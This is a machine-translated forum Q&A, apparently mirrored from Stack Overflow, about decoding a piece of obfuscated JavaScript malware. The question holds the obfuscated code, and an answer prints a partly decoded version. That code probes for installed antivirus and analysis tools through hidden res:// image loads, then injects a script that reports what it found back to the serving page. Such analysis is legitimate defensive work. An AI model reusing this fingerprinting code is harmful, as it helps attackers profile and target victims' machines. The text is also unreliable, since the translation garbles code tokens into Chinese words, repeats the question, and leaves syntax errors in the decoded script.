Javascript恶意软件除臭
我在JavaScript中发现了某种恶意软件。因为它很模糊,而且很长,我需要一些关于如何自动去泡沫的想法。逐行恢复会花费太多时间 抱歉代码太长,我不知道它现在在做什么。。。 我们开始: var raelpit=[], zfpamzl=0, cndelds=0, tclnil=0, tctidehr=0, uCa=0, datmpeb=false, 埃森特= YOTNRWCP tHXRzIKDmqcnoXkelPfOuAtCQ jpFreviqesaOhUe ZJbVLdMq 代替 /[wDLOCHMXqARZJmPjUFVkKIuQ]/g, .第20,0; 函数pbpiakdldrefdu{ Hntpeed=Hntpeed.replace/^/, ldrefdu+2; } 函数nrimsm押韵{ var uohsev; uohsev=document.createElement “msaptuostrdykixucn Dltyowyihhhhqkiaqzrlchpzlimcafgskdzfyitetwklysoyijamgdkgnmksr” 代替 /[WzfkHCAcyKZJOIQTPLMqYNtDBX]/g, .第16、3款; uohsev.style.display= “RSFCTKQHGWPJHEBTTYZETUICXUELNN HKCQZZNOZWOHMNEOOCNAWJSMQTE” 代替 /[CHhyWZXpckbaNQrUgTiMJqzO]/g, .第13、4款; vneltoas=oERRIK 0 ctstahj+= ildciea+ “LliwooCNPSBCSINERBEB qhzUJeGu,ySOsqgTZNWMgQXEyDvjeTUi” 代替 /[qOSGNWjUEsXlLQwDTCBJpZMz]/g, .第13、1款; ildciea++; } var nlmata=文档[ “Rysegznnktfa gpdocrptgswehcjinqprjakeatytcmgoeffoheylevmmentukfmoahqrrphozvdr” 代替 /[gonfjdvgkqazvpydhrchwpmit]/g, .第13、13段] “ELZSDBGAMUPPJDVv VLFHXIYGQDNWGOABZBPSI KTESCFRXHEHOHIDRGYCWGPWLEJMOYEHWSFBLHPISI” 代替 /[MGDEBILypHvbSJOCzRXoPVWF]/g, .第18、2款+ “PPVyptrwSifyhrlxRaviptngingiqmwteslkf LbMOkCsjVWGztMoVur” 代替 /[jwKbSMFgWvPOCGaqzImxVRsLh]/g, .第6、4款; 恩尔马塔[ “MBdQDhogneFIrnWlAPJWjpsDx mpvqBcXxiiGfBhYuJOKshUrcrCLyilQxbdlFee” 代替 /[WhgQFKJBLYGMfDOXCxPUqjAIo]/g, .第16条第3款]= 'mViEuZlOFaEZqtuKnCUqwnCKjlovxLr.htpm?eqkswfpkcdd' 代替 /[aFCpZqKdLVDwOrPUoEWk]/g, .8,9+数学 .随机的+ “MXiZAQHnTfnkcAjpau,lrkxxtezwdfsfbdex EusNeEnKVIslTBgPCm” 代替 /[EHCBMIPZUFDXAQXLFKBRTNJTKV]/g, .第6、1款+ ctstahjh; var yilwre=document.body; yilwre.insertBeforenlmata,yilwre.firstChild; }Javascript恶意软件除臭,javascript,malware,deobfuscation,Javascript,Malware,Deobfuscation,我在JavaScript中发现了某种恶意软件。因为它很模糊,而且很长,我需要一些关于如何自动去泡沫的想法。逐行恢复会花费太多时间 抱歉代码太长,我不知道它现在在做什么。。。 我们开始: var raelpit=[], zfpamzl=0, cndelds=0, tclnil=0, tctidehr=0, uCa=0, datmpeb=false, 埃森特= YOTNRWCP tHXRzIKDmqcnoXkelPfOuAtCQ jpFreviqesaOhUe ZJbVLdMq 代替 /[wDLO
我使用setTimeout函数并将其分配给一个变量,然后使用这个变量;这个变量;看看它做了什么,但它不是超级有用 我认为有几种方法可以解决这个问题,但第一步肯定是解码它。我不需要在这里发布这篇文章,因为它不会自己运行,至少有一个变量没有定义 希望这能为你们做点工作=
var raelpit = [],
zfpamzl = 0,
cndelds = 0,
tclnil = 0,
tctidehr = 0,
ucaeggs = 0,
datmpeb = false,
esrent = '';
function pbpiakd(ldrefdu) {
hntpeeed = hntpeeed.replace(/^/, ldrefdu + 2);
}
function nrimsm(rhteayms) {
var uohsev = document.createElement('img');
uohsev.style.display = 'none';
// vneltoas is not defined =/
vneltoas = oerriik << 4;
vneltoas = rhteayms + '/#' + vneltoas + '/' + '_1';
uohsev['tpyjyvz'] = rhteayms;
vneltoas = vneltoas.replace('_', '#');
raelpit.push(uohsev);
// CURRENT SITE STARTS WITH HTTP?... The next line takes a substring and
// then replaces part of it with the value of iyslenda... If the site starts with
// http:// then you can just assume the final code will be 'iyslenda://' + vneltoas;
// In this case, I've rewritten it to do the same thing but cleaner. That is unless
// the document ISN'T http but ftp or something else, of course. =)
uohsev['setAttribute']('src', iyslenda + '://' + this.document.location.href.substr(7) + vneltoas);
var vlldlsy = document.body;
vlldlsy.insertBefore(uohsev, vlldlsy.firstChild);
}
esrent = "\";
dfrrtgrn = "C:\wIndOws\sY";
function rreiqsfd(rhteayms) {
nrimsm("C:\Program Files\" + rhteayms);
nrimsm("C:\Program Files (x86)\" + rhteayms);
}
dfrrtgrn += "C:\wIndOws\sYstem3";
var hntpeeed = 'drivers';
var iyslenda = 'e';
setTimeout(function() {
if (Math.random() < 0.2) {
iyslenda = 'r' + iyslenda;
}
else {
iyslenda += 's';
}
}
iyslenda.replace(/(.)\1+/g, '$1');
if (iyslenda.length < 3) {
setTimeout(arguments.callee, 1)
}
}, 1);
hntpeeed += esrent;
hntpeeed = esrent + hntpeeed;
pbpiakd(dfrrtgrn);
setTimeout(function() {
{
nrimsm(hntpeeed + 'aCpI.sys');
nrimsm('iyQXFlpc.sys');
nrimsm(hntpeeed + 'mbam.sys');
nrimsm(hntpeeed + 'MBAMSwissArmy.sys');
nrimsm(hntpeeed + 'mwac.sys');
nrimsm(hntpeeed + 'mbamchameleon.sys');
rreiqsfd('Malwarebytes Anti-Exploit\mbae.exe');
rreiqsfd('Malwarebytes Anti-Malware\mbam.exe');
rreiqsfd('AVAST Software\Avast\AvastUI.exe');
rreiqsfd('norton security\Branding\muis.dll');
rreiqsfd('norton internet security\Branding\muis.dll');
rreiqsfd('F-Secure\trigger.exe');
nrimsm(hntpeeed + 'fsbts.sys');
var siatsii = 'Kaspersky Lab\Kaspersky ';
rreiqsfd(siatsii + 'Total Security 15.0.2\avpui.exe');
rreiqsfd(siatsii + 'Internet Security 15.0.2\avpui.exe')
rreiqsfd(siatsii + 'Anti-Virus 15.0.2\avpui.exe');
rreiqsfd(siatsii + 'Small Office Security 3\starter_avp.exe');
nrimsm(hntpeeed + 'driverskbfilter.sys');
var sosvaki = 'Trend Micro\';
rreiqsfd(sosvaki + 'Titanium\UIFramework\uiWinMgr.exe');
rreiqsfd(sosvaki + 'TMIDS\PwmConsole.exe');
rreiqsfd('Security Agent\PCCNtMon.exe');
rreiqsfd('Client Server Security Agent\PccNTMon.exe');
rreiqsfd('Security Server\PCCSRV\Apache2\bin\ApacheMonitor.exe');
rreiqsfd('Browser Guard\BGUi.exe');
rreiqsfd('Fiddler2\Fiddler.exe');
rreiqsfd('Fiddler4\Fiddler.exe');
rreiqsfd('OpenVPN\Uninstall.exe');
rreiqsfd('Symantec\LiveUpdate\MSVCR71.dll');
rreiqsfd('Common Files\Symantec Shared\ccEvtMgr.exe');
}
setTimeout(stwsiis, 1000);
}, 1500);
function stwsiis() {
if (datmpeb)
return;
datmpeb = true;
var ctstahjh = '',
ildciea = 0;
for (var i in raelpit) {
var found = false;
try {
if (raelpit[i]['fileUpdatedDate'] == '')
found = false;
else
found = true;
} catch (e) {
found = true;
}
if (found > 0)
ctstahjh += ildciea + ',';
ildciea++;
}
var nlmata = document['createElement']('script');
nlmata['src'] = 'jlvx.htm?' + Math.random() + ',' + ctstahjh;
var yilwre = document.body;
yilwre.insertBefore(nlmata,yilwre.firstChild);
}
是的,我肯定会说那里有些可疑;-
小心
另外,很抱歉语法突出显示。现在我能做的只有这么多,我必须离开抱歉…你可以在安全的环境中复制这个恶意软件VirtualBox或Vmware,我认为这是了解这个Js正在做什么的最好方法,就是在控制台或浏览器中复制它。 如果您想在控制台中复制它,可以使用 也许你可以通过阅读源代码了解到你在做什么,但是如果你复制了恶意软件,你可以100%地理解你在做什么 我希望这有帮助。
问候。在您解除泡沫后,您将做什么?它是在脚本标记中还是在.js文件中?这不太可能,但是制作它的人可能愚蠢到包含了一个源地图。